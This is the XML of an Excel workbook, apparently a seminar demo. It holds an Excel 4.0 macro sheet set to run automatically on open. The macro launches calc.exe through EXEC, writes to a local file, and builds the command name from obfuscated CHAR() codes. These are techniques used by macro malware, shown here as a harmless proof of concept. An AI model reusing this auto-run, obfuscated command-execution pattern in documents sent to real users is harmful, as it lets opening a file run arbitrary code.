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/>
  <workbookPr defaultThemeVersion="166925"/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="E:\Presentations\Seminar\2022\The Art of Code\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{D4918547-4D66-42BE-BCDE-2907D2BD866E}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="7200" yWindow="3690" windowWidth="21600" windowHeight="11385" xr2:uid="{989A3C46-4C01-4BE2-A802-BB2FFE97FE66}"/>
  </bookViews>
  <sheets>
    <sheet name="Macro1" sheetId="2" r:id="rId1"/>
    <sheet name="Sheet1" sheetId="1" r:id="rId2"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm.Auto_open">Macro1!$A$1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macro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404C981A-7DA2-4B30-AECA-86725D7A16C1}">
  <dimension ref="A1:C4"/>
  <sheetViews>
    <sheetView showFormulas="1" tabSelected="1" workbookViewId="0">
      <selection activeCell="C1" sqref="C1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="10.85546875" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="32.140625" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A1">
        <f>EXEC("calc.exe")</f>
        <v>33</v>
      </c>
      <c r="B1">
        <f>FOPEN("E:/Presentations/Seminar/2022/The Art of Code/file.txt", 3)</f>
        <v>0</v>
      </c>
      <c r="C1" t="str">
        <f>CHAR(99)&amp;CHAR(97)&amp;CHAR(108)&amp;CHAR(99)&amp;CHAR(46)&amp;CHAR(101)&amp;CHAR(120)&amp;CHAR(101)</f>
        <v>calc.exe</v>
      </c>
    </row>
    <row r="2" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A2" t="b">
        <f>HALT()</f>
        <v>1</v>
      </c>
      <c r="B2" t="b">
        <f>FWRITE(B1, "Satria Ady Pradana")</f>
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:3" x14ac:dyDescent="0.25">
      <c r="B3">
        <f>FCLOSE(B1)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.25">
      <c r="B4" t="b">
        <f>HALT()</f>
        <v>1</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1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D1A13-9077-4B3C-B9A6-AB4B5B86BE4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Sheet1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xathrya</dc:creator>
  <cp:lastModifiedBy>xathrya</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-22T19:36:09Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-23T13:11:19Z</dcterms:modified>
</cp:coreProperties>
</file>